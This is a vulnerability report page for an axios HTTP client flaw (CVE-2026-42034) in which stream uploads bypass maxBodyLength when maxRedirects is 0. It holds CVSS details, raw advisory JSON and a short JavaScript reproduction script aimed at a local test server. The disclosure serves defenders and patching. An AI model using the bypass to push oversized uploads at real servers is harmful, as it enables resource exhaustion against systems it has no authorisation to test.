Security Vulnerability Report
CVE-2026-42034 CVSS 5.3 MEDIUM

CVE-2026-42034

Published: 2026-04-24 18:16:30
Last Modified: 2026-04-27 19:59:18

Description

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, for stream request bodies, maxBodyLength is bypassed when maxRedirects is set to 0 (native http/https transport path). Oversized streamed uploads are sent fully even when the caller sets strict body limits. This vulnerability is fixed in 1.15.1 and 0.31.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:* - VULNERABLE
Axios < 1.15.1
Axios < 0.31.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
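// Reproduction check for CVE-2026-42034: with a stream request body and
// maxRedirects set to 0, axios (< 1.15.1 / < 0.31.1) uses the native
// http/https transport path and does not enforce maxBodyLength.
// Point it at a local test server you control. An affected axios sends the
// whole body and resolves; a fixed version is expected to reject the request.
const http = require('http'); // was missing in the original: `new http.Agent` threw a ReferenceError
const axios = require('axios');
const { Readable } = require('stream');

// Caller-imposed body limit (1 MB) and a payload that exceeds it.
// Twice the limit is enough to show whether the limit is enforced; the
// original 500 MB constant only made the check slow and memory-hungry.
const MAX_BODY_BYTES = 1024 * 1024;
const PAYLOAD_BYTES = 2 * MAX_BODY_BYTES;

// Stream body: push the whole payload up front, then signal end-of-stream.
const largeStream = new Readable({ read() {} });
largeStream.push('x'.repeat(PAYLOAD_BYTES));
largeStream.push(null);

axios
  .post('http://localhost:3000/upload', largeStream, {
    maxBodyLength: MAX_BODY_BYTES, // intended to block the oversized request
    maxRedirects: 0, // 0 selects the native http/https transport path described in the advisory
    headers: { 'Content-Type': 'application/octet-stream' },
    httpAgent: new http.Agent({ keepAlive: true }),
  })
  .then((response) => {
    // The body exceeded maxBodyLength, so any response means the limit was not enforced.
    console.log('Request sent successfully (Limit Bypassed)', response.status);
  })
  .catch((error) => {
    // A rejection is either the limit being enforced (fixed axios) or a transport
    // error such as no server listening on localhost:3000; the code tells them apart.
    console.error('Request failed:', error.code, error.message);
  });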

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42034", "sourceIdentifier": "[email protected]", "published": "2026-04-24T18:16:30.140", "lastModified": "2026-04-27T19:59:18.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, for stream request bodies, maxBodyLength is bypassed when maxRedirects is set to 0 (native http/https transport path). Oversized streamed uploads are sent fully even when the caller sets strict body limits. This vulnerability is fixed in 1.15.1 and 0.31.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.31.1", "matchCriteriaId": "7D2B28C9-026E-4CD6-BD17-7EDD42108106"}, {"vulnerable": true, "criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.15.1", "matchCriteriaId": "3EC1EF30-EBB8-410B-90FB-1F18A3545C2E"}]}]}], "references": [{"url": "https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", 
"Vendor Advisory"]}]}}